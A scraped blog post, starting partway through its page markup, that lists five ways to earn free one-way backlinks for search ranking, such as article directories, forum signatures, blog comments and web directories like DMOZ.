0pt 10px 10px 0pt; width: 320px;" /></a><span class="post-comment-link"> </span><span class="post-backlinks post-comment-link"></span><span class="post-icons"><span class="item-control blog-admin pid-1264754267"><a href="http://www.blogger.com/post-edit.g?blogID=7346187914388933348&postID=637528825784919145" title="Edit Post"><span class="quick-edit-icon"></span></a></span></span><br />
<br />
One way backlinks are very critical to any website success. The more one way backlinks pointing to your site, the more your Google Pagerank and the more amount of traffic you will get. This should also increase your sales,etc.<br />
But the thing is.. getting the right and quality one way backlinks from high pagerank sites is not an easy task, and in this article, we'll find out some of the best ways to get free one way backlinks:<br />
<br />
<span style="color: #009900; font-weight: bold;">1.</span> Try to write as much quality content as you can... that will encourage the readers to link to your site. The more useful, informative content you post, the more likely people are to link it. But, this method can take a while to really pay off because like all the new websites, you don't get much traffic.<br />
<br />
<span style="color: #009900; font-weight: bold;">2.</span> Write quality articles and submit them to top article directories like ezinearticles and goarticles. The advantage in this is, you'll not only get a backlink from high pagerank directories, but also you'll find that your articles are used on other people's sites with a backlink to your site.<br />
<br />
<span style="color: #009900; font-weight: bold;">3.</span> Participate in forums,discussion boards that are related to your website's niche and add a link to your site in the signature. Make sure that you write quality posts, don't spam. This will also help you get some decent traffic to your site.<br />
<br />
<span style="color: #009900; font-weight: bold;">4.</span> There is absolutely nothing wrong to get a backlink from a related blog post you decide to comment on. This is one of the effective way of one way link building especially if you comment often on blogs. Comment on blogs related to your niche with a link back to your site as your signature.. and Again, make sure you never spam.<br />
<br />
<span style="color: #009900; font-weight: bold;">5.</span> Submit your site link to major, well known web directories. Getting listed in directories related to your site not only bring you tons of targetted traffic, but will also improve your search engine rankings. Some of the popular directories to get listed in are DMOZ directory and Yahoo directory. You can submit your link to both paid and free directories and they worth your time.<br />
<br />
*******************************END***********************************</div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.com